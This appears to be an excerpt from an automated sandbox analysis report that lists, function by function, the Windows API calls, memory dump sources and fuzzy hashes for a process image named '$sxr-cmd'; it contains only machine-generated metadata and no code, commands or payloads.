                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$DriveNamePathTypeVolume
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029679093-0
                                                                                                            • Opcode ID: 6748089b4443443f9a7b5956cbfff3df7ba18ce7bcf44918d808dc6be18eadc0
                                                                                                            • Instruction ID: 380294a737a415dd4f67ed1195f8825fd0f93e0cafe62696934ff6eda986818e
                                                                                                            • Opcode Fuzzy Hash: 6748089b4443443f9a7b5956cbfff3df7ba18ce7bcf44918d808dc6be18eadc0
                                                                                                            • Instruction Fuzzy Hash: 4C31AB32705F818AEBA09F21D8843E8B7A0FB89B94F844035CA5D5B744CF3DD659C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2448200120-0
                                                                                                            • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                            • Instruction ID: 5eaef96ef6a0a42dcf915e6372901be268c6147914e6e0a3a4189025fcd2f5da
                                                                                                            • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                            • Instruction Fuzzy Hash: 2D217C31A08F028BE7947B11A44017AF6A1FB89BA0F844135E90E27784CF3EE428CB70
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1617791916-0
                                                                                                            • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                            • Instruction ID: 728a9af83dde2cbd332ebe61bc9142caeb7a6a62735bb5a116d95da25e8403d9
                                                                                                            • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                            • Instruction Fuzzy Hash: 7221B861608F4186EB44AB51A540079FBA1FF8DBE0B849130DE2E63755DF3DE40D8730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF7137F3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7137F3D0C
                                                                                                              • Part of subcall function 00007FF7137F3C24: towupper.MSVCRT ref: 00007FF7137F3D2F
                                                                                                              • Part of subcall function 00007FF7137F3C24: iswalpha.MSVCRT ref: 00007FF7137F3D4F
                                                                                                              • Part of subcall function 00007FF7137F3C24: towupper.MSVCRT ref: 00007FF7137F3D75
                                                                                                              • Part of subcall function 00007FF7137F3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137F3DBF
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925,?,?,?,?,00007FF7137EB9B1), ref: 00007FF7137E6ABF
                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925,?,?,?,?,00007FF7137EB9B1), ref: 00007FF7137E6AD3
                                                                                                              • Part of subcall function 00007FF7137E6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7137E6AE8,?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925), ref: 00007FF7137E6B8B
                                                                                                              • Part of subcall function 00007FF7137E6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7137E6AE8,?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925), ref: 00007FF7137E6B97
                                                                                                              • Part of subcall function 00007FF7137E6B84: RtlFreeHeap.NTDLL(?,?,?,?,00007FF7137E6AE8,?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925), ref: 00007FF7137E6BAF
                                                                                                              • Part of subcall function 00007FF7137E6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137E6AF1,?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925), ref: 00007FF7137E6B39
                                                                                                              • Part of subcall function 00007FF7137E6B30: RtlFreeHeap.NTDLL(?,?,?,00007FF7137E6AF1,?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925), ref: 00007FF7137E6B4D
                                                                                                              • Part of subcall function 00007FF7137E6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137E6AF1,?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925), ref: 00007FF7137E6B59
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925,?,?,?,?,00007FF7137EB9B1), ref: 00007FF7137E6B03
                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925,?,?,?,?,00007FF7137EB9B1), ref: 00007FF7137E6B17
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                            • String ID:
                                                                                                            • API String ID: 3512109576-0
                                                                                                            • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                            • Instruction ID: 731034cc1d6e13a39e0f41232fd60d2a57bfa8ef6fe3322070c527bae552a847
                                                                                                            • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                            • Instruction Fuzzy Hash: 0721A122A09E8285EB84BB65D4502B8BBE1EF5DB64F948135C90E27351DF3DE45DC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137EAF82), ref: 00007FF7137EB6D0
                                                                                                            • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137EAF82), ref: 00007FF7137EB6E7
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137EAF82), ref: 00007FF7137EB701
                                                                                                            • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137EAF82), ref: 00007FF7137EB715
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocSize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2549470565-0
                                                                                                            • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                            • Instruction ID: a97f3293afb1b94a9ad5a9cbf4f5139a872fdb44371a3507ca758b9eb079b436
                                                                                                            • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                            • Instruction Fuzzy Hash: 7921366290DE42C6EB95AB51E480078EA91FF4CBA0BC89536DA4E23B54DF3CD45DD730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7137F507A), ref: 00007FF71380D01C
                                                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7137F507A), ref: 00007FF71380D033
                                                                                                            • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7137F507A), ref: 00007FF71380D06D
                                                                                                            • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7137F507A), ref: 00007FF71380D07F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                            • String ID:
                                                                                                            • API String ID: 1033415088-0
                                                                                                            • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                            • Instruction ID: a39cfa7076a43273d335208b09b9e3e5488a839591ce6610f718afe0e5feb89f
                                                                                                            • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                            • Instruction Fuzzy Hash: ED116331618A4287DB845B10F05417AF7E0FB8ABA5F805135EA8E57B54DF7DD0598B20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                            • String ID:
                                                                                                            • API String ID: 22757656-0
                                                                                                            • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                            • Instruction ID: 493c66bd95201356e4cb2951660dc17c28aa41c687341405ca7b0476d0cfa224
                                                                                                            • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                            • Instruction Fuzzy Hash: C511B272A14A458BE7806B24E08837DBAA0FB89B74FA44334D62E073D0CF7DC45D8B20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF713805433,?,?,?,00007FF7138069B8,?,?,?,?,?,00007FF7137F8C39), ref: 00007FF7138056C5
                                                                                                            • RtlFreeHeap.NTDLL(?,?,00000028,00007FF713805433,?,?,?,00007FF7138069B8,?,?,?,?,?,00007FF7137F8C39), ref: 00007FF7138056D9
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF713805433,?,?,?,00007FF7138069B8,?,?,?,?,?,00007FF7137F8C39), ref: 00007FF7138056FD
                                                                                                            • RtlFreeHeap.NTDLL(?,?,00000028,00007FF713805433,?,?,?,00007FF7138069B8,?,?,?,?,?,00007FF7137F8C39), ref: 00007FF713805711
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$FreeProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 3859560861-0
                                                                                                            • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                            • Instruction ID: cf00cad01ab36e3ef6b66a075ee54e806e4df6f3c591bf4ffc6b9c212680e6b0
                                                                                                            • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                            • Instruction Fuzzy Hash: 64112872A04F81CADB019F56E4040ACBBA0F749F94B888135DB4E13718DF38E4AACB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                            • String ID:
                                                                                                            • API String ID: 140117192-0
                                                                                                            • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                            • Instruction ID: 36efa8f06711b38369d8ccd9a0f7667d4c07018563c9cba09fa6183cf9008311
                                                                                                            • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                            • Instruction Fuzzy Hash: 1921C335908F4189E780AF14F880369F7A4FB89764F900136DA8D62764EF7EE46CC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleMode_get_osfhandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 1606018815-0
                                                                                                            • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                            • Instruction ID: c363a19d63f6e9996f30205302280f7524e4412a37066bd33e93f81b384d60d4
                                                                                                            • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                            • Instruction Fuzzy Hash: CCF01C31A25E42CFD7846B10E444179FA60FB8AB12F849274DA0B12394DF7DD11D8B20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileType
                                                                                                            • String ID: \\.\pipe\
                                                                                                            • API String ID: 3081899298-91387939
                                                                                                            • Opcode ID: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                            • Instruction ID: d3d4abd078e8d08a883bbede54becaaa110dbc2b2a575260a9055ad6c1863adb
                                                                                                            • Opcode Fuzzy Hash: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                            • Instruction Fuzzy Hash: D071C472200FA4E9EF649E259949BEE6792F7E6789FC00056FE4A43B88DF35C548C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF7137ECD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137EB9A1,?,?,?,?,00007FF7137ED81A), ref: 00007FF7137ECDA6
                                                                                                              • Part of subcall function 00007FF7137ECD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF7137EB9A1,?,?,?,?,00007FF7137ED81A), ref: 00007FF7137ECDBD
                                                                                                            • wcschr.MSVCRT ref: 00007FF7138111DC
                                                                                                            • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF71380827A), ref: 00007FF713811277
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocateProcessmemmovewcschr
                                                                                                            • String ID: &()[]{}^=;!%'+,`~
                                                                                                            • API String ID: 4220614737-381716982
                                                                                                            • Opcode ID: 4465c0fa31a1beeeb26cedcce685c4bef0802ab666226652cc1f9f3b5947b5db
                                                                                                            • Instruction ID: c3fa9f046f3d6908dfc9505e6f26d1558fe890871abfd486005eee228dac8dac
                                                                                                            • Opcode Fuzzy Hash: 4465c0fa31a1beeeb26cedcce685c4bef0802ab666226652cc1f9f3b5947b5db
                                                                                                            • Instruction Fuzzy Hash: AA71F971A08A4289D7E0EF15A480679F7E4FB987A4FD04235C94E93B94DF3EA459CB30
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF7137F06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F06D6
                                                                                                              • Part of subcall function 00007FF7137F06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F06F0
                                                                                                              • Part of subcall function 00007FF7137F06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F074D
                                                                                                              • Part of subcall function 00007FF7137F06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F0762
                                                                                                            • longjmp.MSVCRT ref: 00007FF7137FCCBC
                                                                                                            • longjmp.MSVCRT(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137FCCE0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
